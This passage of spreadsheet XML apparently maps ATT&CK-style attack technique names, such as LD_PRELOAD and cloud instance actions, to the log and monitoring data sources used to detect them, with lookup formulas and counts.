        <f>LOOKUP(A440,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring</v>
      </c>
      <c r="C440" s="53"/>
      <c r="D440" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E440" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G440" s="53" t="str">
        <f>VLOOKUP(A440,'REF-DataSources'!A:B,2)</f>
        <v>Executable Installer File Permissions Weakness</v>
      </c>
    </row>
    <row r="441" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A441" s="53" t="s">
        <v>2535</v>
      </c>
      <c r="B441" s="17" t="str">
        <f>LOOKUP(A441,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Environment variable</v>
      </c>
      <c r="C441" s="53"/>
      <c r="D441" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E441" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G441" s="53" t="str">
        <f>VLOOKUP(A441,'REF-DataSources'!A:B,2)</f>
        <v>LD_PRELOAD</v>
      </c>
    </row>
    <row r="442" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A442" s="55" t="s">
        <v>2540</v>
      </c>
      <c r="B442" s="17" t="str">
        <f>LOOKUP(A442,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C442" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D442" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E442" s="17">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="G442" s="53" t="str">
        <f>VLOOKUP(A442,'REF-DataSources'!A:B,2)</f>
        <v>Path Interception by PATH Environment Variable</v>
      </c>
    </row>
    <row r="443" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A443" s="55" t="s">
        <v>2544</v>
      </c>
      <c r="B443" s="17" t="str">
        <f>LOOKUP(A443,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C443" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D443" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E443" s="17">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="G443" s="53" t="str">
        <f>VLOOKUP(A443,'REF-DataSources'!A:B,2)</f>
        <v>Path Interception by Search Order Hijacking</v>
      </c>
    </row>
    <row r="444" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A444" s="55" t="s">
        <v>2548</v>
      </c>
      <c r="B444" s="17" t="str">
        <f>LOOKUP(A444,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C444" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D444" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E444" s="17">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="G444" s="53" t="str">
        <f>VLOOKUP(A444,'REF-DataSources'!A:B,2)</f>
        <v>Path Interception by Unquoted Path</v>
      </c>
    </row>
    <row r="445" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A445" s="53" t="s">
        <v>2551</v>
      </c>
      <c r="B445" s="17" t="str">
        <f>LOOKUP(A445,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Services,File monitoring</v>
      </c>
      <c r="C445" s="53"/>
      <c r="D445" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E445" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G445" s="53" t="str">
        <f>VLOOKUP(A445,'REF-DataSources'!A:B,2)</f>
        <v>Services File Permissions Weakness</v>
      </c>
    </row>
    <row r="446" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A446" s="53" t="s">
        <v>2556</v>
      </c>
      <c r="B446" s="17" t="str">
        <f>LOOKUP(A446,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Process command-line parameters</v>
      </c>
      <c r="C446" s="53"/>
      <c r="D446" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E446" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G446" s="53" t="str">
        <f>VLOOKUP(A446,'REF-DataSources'!A:B,2)</f>
        <v>Services Registry Permissions Weakness</v>
      </c>
    </row>
    <row r="447" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A447" s="53" t="s">
        <v>2561</v>
      </c>
      <c r="B447" s="17" t="str">
        <f>LOOKUP(A447,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C447" s="53"/>
      <c r="D447" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E447" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G447" s="53" t="str">
        <f>VLOOKUP(A447,'REF-DataSources'!A:B,2)</f>
        <v>COR_PROFILER</v>
      </c>
    </row>
    <row r="448" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A448" s="55" t="s">
        <v>2566</v>
      </c>
      <c r="B448" s="17" t="str">
        <f>LOOKUP(A448,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C448" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D448" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E448" s="17">
        <f t="shared" si="14"/>
        <v>4</v>
      </c>
      <c r="G448" s="53" t="str">
        <f>VLOOKUP(A448,'REF-DataSources'!A:B,2)</f>
        <v>Modify Cloud Compute Infrastructure</v>
      </c>
    </row>
    <row r="449" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A449" s="55" t="s">
        <v>2570</v>
      </c>
      <c r="B449" s="17" t="str">
        <f>LOOKUP(A449,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C449" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D449" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E449" s="17">
        <f t="shared" si="14"/>
        <v>4</v>
      </c>
      <c r="G449" s="53" t="str">
        <f>VLOOKUP(A449,'REF-DataSources'!A:B,2)</f>
        <v>Create Snapshot</v>
      </c>
    </row>
    <row r="450" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A450" s="55" t="s">
        <v>2575</v>
      </c>
      <c r="B450" s="17" t="str">
        <f>LOOKUP(A450,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C450" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D450" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E450" s="17">
        <f t="shared" si="14"/>
        <v>4</v>
      </c>
      <c r="G450" s="53" t="str">
        <f>VLOOKUP(A450,'REF-DataSources'!A:B,2)</f>
        <v>Create Cloud Instance</v>
      </c>
    </row>
    <row r="451" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A451" s="55" t="s">
        <v>2579</v>
      </c>
      <c r="B451" s="17" t="str">
        <f>LOOKUP(A451,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C451" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D451" s="17">
        <f t="shared" ref="D451:D514" si="15">LEN(TRIM(B451))-LEN(SUBSTITUTE(TRIM(B451),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E451" s="17">
        <f t="shared" si="14"/>
        <v>4</v>
      </c>
      <c r="G451" s="53" t="str">
        <f>VLOOKUP(A451,'REF-DataSources'!A:B,2)</f>
        <v>Delete Cloud Instance</v>
      </c>
    </row>
    <row r="452" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A452" s="55" t="s">
        <v>2583</v>
      </c>
      <c r="B452" s="17" t="str">
        <f>LOOKUP(A452,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C452" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D452" s="17">
        <f t="shared" si="15"/>
        <v>4</v>
      </c>
      <c r="E452" s="17">
        <f t="shared" si="14"/>
        <v>4</v>
      </c>
      <c r="G452" s="53" t="str">
        <f>VLOOKUP(A452,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="453" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A453" s="55" t="s">
        <v>2587</v>
      </c>
      <c r="B453" s="17" t="str">
        <f>LOOKUP(A453,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,AWS CloudTrail logs,Azure activity logs</v>
      </c>
      <c r="C453" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D453" s="17">
        <f t="shared" si="15"/>
        <v>4</v>
      </c>
      <c r="E453" s="17">
        <f t="shared" si="14"/>
        <v>4</v>
      </c>
      <c r="G453" s="53" t="str">
        <f>VLOOKUP(A453,'REF-DataSources'!A:B,2)</f>
        <v>Cloud Infrastructure Discovery</v>
      </c>
    </row>
    <row r="454" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A454" s="55" t="s">
        <v>2593</v>
      </c>
      <c r="B454" s="17" t="str">
        <f>LOOKUP(A454,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C454" s="53">
        <v>0</v>
      </c>
      <c r="D454" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E454" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G454" s="53" t="str">
        <f>VLOOKUP(A454,'REF-DataSources'!A:B,2)</f>
        <v>Acquire Infrastructure</v>
      </c>
    </row>
    <row r="455" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A455" s="55" t="s">
        <v>2599</v>
      </c>
      <c r="B455" s="17" t="str">
        <f>LOOKUP(A455,'REF-DataSources'!A:C)</f>
        <v>Domain registration</v>
      </c>
      <c r="C455" s="53">
        <v>100</v>
      </c>
      <c r="D455" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E455" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G455" s="53" t="str">
        <f>VLOOKUP(A455,'REF-DataSources'!A:B,2)</f>
        <v>Domains</v>
      </c>
    </row>
    <row r="456" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A456" s="55" t="s">
        <v>2604</v>
      </c>
      <c r="B456" s="17" t="str">
        <f>LOOKUP(A456,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C456" s="53">
        <v>0</v>
      </c>
      <c r="D456" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E456" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G456" s="53" t="str">
        <f>VLOOKUP(A456,'REF-DataSources'!A:B,2)</f>
        <v>DNS Server</v>
      </c>
    </row>
    <row r="457" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A457" s="55" t="s">
        <v>2608</v>
      </c>
      <c r="B457" s="17" t="str">
        <f>LOOKUP(A457,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C457" s="53">
        <v>0</v>
      </c>
      <c r="D457" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E457" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="G457" s="53" t="str">
        <f>VLOOKUP(A457,'REF-DataSources'!A:B,2)</f>
        <v>Virtual Private Server</v>
      </c>
    </row>
    <row r="458" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A458" s="55" t="s">
        <v>2611</v>
      </c>
      <c r="B458" s="17" t="str">
        <f>LOOKUP(A458,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C458" s="53">
        <v>0</v>
      </c>
      <c r="D458" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E458" s="17">
        <f t="shared" ref="E458:E521" si="16">LEN(TRIM(C458))-LEN(SUBSTITUTE(TRIM(C458),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="G458" s="53" t="str">
        <f>VLOOKUP(A458,'REF-DataSources'!A:B,2)</f>
        <v>Server</v>
      </c>
    </row>
    <row r="459" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A459" s="55" t="s">
        <v>2614</v>
      </c>
      <c r="B459" s="17" t="str">
        <f>LOOKUP(A459,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C459" s="53">
        <v>0</v>
      </c>
      <c r="D459" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E459" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G459" s="53" t="str">
        <f>VLOOKUP(A459,'REF-DataSources'!A:B,2)</f>
        <v>Botnet</v>
      </c>
    </row>
    <row r="460" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A460" s="55" t="s">
        <v>2618</v>
      </c>
      <c r="B460" s="17" t="str">
        <f>LOOKUP(A460,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C460" s="53">
        <v>0</v>
      </c>
      <c r="D460" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E460" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G460" s="53" t="str">
        <f>VLOOKUP(A460,'REF-DataSources'!A:B,2)</f>
        <v>Web Services</v>
      </c>
    </row>
    <row r="461" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A461" s="55" t="s">
        <v>2622</v>
      </c>
      <c r="B461" s="17" t="str">
        <f>LOOKUP(A461,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C461" s="53">
        <v>0</v>
      </c>
      <c r="D461" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E461" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G461" s="53" t="str">
        <f>VLOOKUP(A461,'REF-DataSources'!A:B,2)</f>
        <v>Compromise Infrastructure</v>
      </c>
    </row>
    <row r="462" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A462" s="55" t="s">
        <v>2626</v>
      </c>
      <c r="B462" s="17" t="str">
        <f>LOOKUP(A462,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C462" s="53">
        <v>0</v>
      </c>
      <c r="D462" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E462" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G462" s="53" t="str">
        <f>VLOOKUP(A462,'REF-DataSources'!A:B,2)</f>
        <v>Domains</v>
      </c>
    </row>
    <row r="463" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A463" s="55" t="s">
        <v>2628</v>
      </c>
      <c r="B463" s="17" t="str">
        <f>LOOKUP(A463,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C463" s="53">
        <v>0</v>
      </c>
      <c r="D463" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E463" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G463" s="53" t="str">
        <f>VLOOKUP(A463,'REF-DataSources'!A:B,2)</f>
        <v>DNS Server</v>
      </c>
    </row>
    <row r="464" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A464" s="55" t="s">
        <v>2630</v>
      </c>
      <c r="B464" s="17" t="str">
        <f>LOOKUP(A464,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C464" s="53">
        <v>0</v>
      </c>
      <c r="D464" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E464" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G464" s="53" t="str">
        <f>VLOOKUP(A464,'REF-DataSources'!A:B,2)</f>
        <v>Virtual Private Server</v>
      </c>
    </row>
    <row r="465" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A465" s="55" t="s">
        <v>2632</v>
      </c>
      <c r="B465" s="17" t="str">
        <f>LOOKUP(A465,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C465" s="53">
        <v>0</v>
      </c>
      <c r="D465" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E465" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G465" s="53" t="str">
        <f>VLOOKUP(A465,'REF-DataSources'!A:B,2)</f>
        <v>Server</v>
      </c>
    </row>
    <row r="466" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A466" s="55" t="s">
        <v>2634</v>
      </c>
      <c r="B466" s="17" t="str">
        <f>LOOKUP(A466,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C466" s="53">
        <v>0</v>
      </c>
      <c r="D466" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E466" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G466" s="53" t="str">
        <f>VLOOKUP(A466,'REF-DataSources'!A:B,2)</f>
        <v>Botnet</v>
      </c>
    </row>
    <row r="467" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A467" s="55" t="s">
        <v>2636</v>
      </c>
      <c r="B467" s="17" t="str">
        <f>LOOKUP(A467,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C467" s="53">
        <v>0</v>
      </c>
      <c r="D467" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E467" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G467" s="53" t="str">
        <f>VLOOKUP(A467,'REF-DataSources'!A:B,2)</f>
        <v>Web Services</v>
      </c>
    </row>
    <row r="468" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A468" s="55" t="s">
        <v>2638</v>
      </c>
      <c r="B468" s="17" t="str">
        <f>LOOKUP(A468,'REF-DataSources'!A:C)</f>
        <v>Social media monitoring</v>
      </c>
      <c r="C468" s="53">
        <v>100</v>
      </c>
      <c r="D468" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E468" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G468" s="53" t="str">
        <f>VLOOKUP(A468,'REF-DataSources'!A:B,2)</f>
        <v>Establish Accounts</v>
      </c>
    </row>
    <row r="469" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A469" s="55" t="s">
        <v>2643</v>
      </c>
      <c r="B469" s="17" t="str">
        <f>LOOKUP(A469,'REF-DataSources'!A:C)</f>
        <v>Social media monitoring</v>
      </c>
      <c r="C469" s="53">
        <v>100</v>
      </c>
      <c r="D469" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E469" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G469" s="53" t="str">
        <f>VLOOKUP(A469,'REF-DataSources'!A:B,2)</f>
        <v>Social Media Accounts</v>
      </c>
    </row>
    <row r="470" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A470" s="55" t="s">
        <v>2647</v>
      </c>
      <c r="B470" s="17" t="str">
        <f>LOOKUP(A470,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C470" s="53">
        <v>0</v>
      </c>
      <c r="D470" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E470" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G470" s="53" t="str">
        <f>VLOOKUP(A470,'REF-DataSources'!A:B,2)</f>
        <v>Email Accounts</v>
      </c>
    </row>
    <row r="471" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A471" s="55" t="s">
        <v>2651</v>
      </c>
      <c r="B471" s="17" t="str">
        <f>LOOKUP(A471,'REF-DataSources'!A:C)</f>
        <v>Social media monitoring</v>
      </c>
      <c r="C471" s="53">
        <v>100</v>
      </c>
      <c r="D471" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E471" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G471" s="53" t="str">
        <f>VLOOKUP(A471,'REF-DataSources'!A:B,2)</f>
        <v>Compromise Accounts</v>
      </c>
    </row>
    <row r="472" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A472" s="55" t="s">
        <v>2655</v>
      </c>
      <c r="B472" s="17" t="str">
        <f>LOOKUP(A472,'REF-DataSources'!A:C)</f>
        <v>Social media monitoring</v>
      </c>
      <c r="C472" s="53">
        <v>100</v>
      </c>
      <c r="D472" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E472" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G472" s="53" t="str">
        <f>VLOOKUP(A472,'REF-DataSources'!A:B,2)</f>
        <v>Social Media Accounts</v>
      </c>
    </row>
    <row r="473" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A473" s="55" t="s">
        <v>2658</v>
      </c>
      <c r="B473" s="17" t="str">
        <f>LOOKUP(A473,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C473" s="53">
        <v>0</v>
      </c>
      <c r="D473" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E473" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G473" s="53" t="str">
        <f>VLOOKUP(A473,'REF-DataSources'!A:B,2)</f>
        <v>Email Accounts</v>
      </c>
    </row>
    <row r="474" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A474" s="55" t="s">
        <v>2660</v>
      </c>
      <c r="B474" s="17" t="str">
        <f>LOOKUP(A474,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C474" s="53">
        <v>0</v>
      </c>
      <c r="D474" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E474" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G474" s="53" t="str">
        <f>VLOOKUP(A474,'REF-DataSources'!A:B,2)</f>
        <v>Develop Capabilities</v>
      </c>
    </row>
    <row r="475" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A475" s="55" t="s">
        <v>2664</v>
      </c>
      <c r="B475" s="17" t="str">
        <f>LOOKUP(A475,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C475" s="53">
        <v>0</v>
      </c>
      <c r="D475" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E475" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G475" s="53" t="str">
        <f>VLOOKUP(A475,'REF-DataSources'!A:B,2)</f>
        <v>Malware</v>
      </c>
    </row>
    <row r="476" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A476" s="55" t="s">
        <v>2668</v>
      </c>
      <c r="B476" s="17" t="str">
        <f>LOOKUP(A476,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C476" s="53">
        <v>0</v>
      </c>
      <c r="D476" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E476" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G476" s="53" t="str">
        <f>VLOOKUP(A476,'REF-DataSources'!A:B,2)</f>
        <v>Code Signing Certificates</v>
      </c>
    </row>
    <row r="477" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A477" s="55" t="s">
        <v>2672</v>
      </c>
      <c r="B477" s="17" t="str">
        <f>LOOKUP(A477,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS certificates</v>
      </c>
      <c r="C477" s="53">
        <v>100</v>
      </c>
      <c r="D477" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E477" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G477" s="53" t="str">
        <f>VLOOKUP(A477,'REF-DataSources'!A:B,2)</f>
        <v>Digital Certificates</v>
      </c>
    </row>
    <row r="478" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A478" s="55" t="s">
        <v>2677</v>
      </c>
      <c r="B478" s="17" t="str">
        <f>LOOKUP(A478,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C478" s="53">
        <v>0</v>
      </c>
      <c r="D478" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E478" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G478" s="53" t="str">
        <f>VLOOKUP(A478,'REF-DataSources'!A:B,2)</f>
        <v>Exploits</v>
      </c>
    </row>
    <row r="479" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A479" s="55" t="s">
        <v>2681</v>
      </c>
      <c r="B479" s="17" t="str">
        <f>LOOKUP(A479,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C479" s="53">
        <v>0</v>
      </c>
      <c r="D479" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E479" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G479" s="53" t="str">
        <f>VLOOKUP(A479,'REF-DataSources'!A:B,2)</f>
        <v>Obtain Capabilities</v>
      </c>
    </row>
    <row r="480" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A480" s="55" t="s">
        <v>2684</v>
      </c>
      <c r="B480" s="17" t="str">
        <f>LOOKUP(A480,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C480" s="53">
        <v>0</v>
      </c>
      <c r="D480" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E480" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G480" s="53" t="str">
        <f>VLOOKUP(A480,'REF-DataSources'!A:B,2)</f>
        <v>Malware</v>
      </c>
    </row>
    <row r="481" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A481" s="55" t="s">
        <v>2686</v>
      </c>
      <c r="B481" s="17" t="str">
        <f>LOOKUP(A481,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C481" s="53">
        <v>0</v>
      </c>
      <c r="D481" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E481" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G481" s="53" t="str">
        <f>VLOOKUP(A481,'REF-DataSources'!A:B,2)</f>
        <v>Tool</v>
      </c>
    </row>
    <row r="482" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A482" s="55" t="s">
        <v>2689</v>
      </c>
      <c r="B482" s="17" t="str">
        <f>LOOKUP(A482,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C482" s="53">
        <v>0</v>
      </c>
      <c r="D482" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E482" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G482" s="53" t="str">
        <f>VLOOKUP(A482,'REF-DataSources'!A:B,2)</f>
        <v>Code Signing Certificates</v>
      </c>
    </row>
    <row r="483" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A483" s="55" t="s">
        <v>2691</v>
      </c>
      <c r="B483" s="17" t="str">
        <f>LOOKUP(A483,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS certificates</v>
      </c>
      <c r="C483" s="53">
        <v>100</v>
      </c>
      <c r="D483" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E483" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G483" s="53" t="str">
        <f>VLOOKUP(A483,'REF-DataSources'!A:B,2)</f>
        <v>Digital Certificates</v>
      </c>
    </row>
    <row r="484" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A484" s="55" t="s">
        <v>2694</v>
      </c>
      <c r="B484" s="17" t="str">
        <f>LOOKUP(A484,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C484" s="53">
        <v>0</v>
      </c>
      <c r="D484" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E484" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G484" s="53" t="str">
        <f>VLOOKUP(A484,'REF-DataSources'!A:B,2)</f>
        <v>Exploits</v>
      </c>
    </row>
    <row r="485" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A485" s="55" t="s">
        <v>2697</v>
      </c>
      <c r="B485" s="17" t="str">
        <f>LOOKUP(A485,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C485" s="53">
        <v>0</v>
      </c>
      <c r="D485" s="17">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E485" s="17">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="G485" s="53" t="str">
        <f>VLOOKUP(A485,'REF-DataSources'!A:B,2)</f>
        <v>Vulnerabilities</v>
      </c>
    </row>
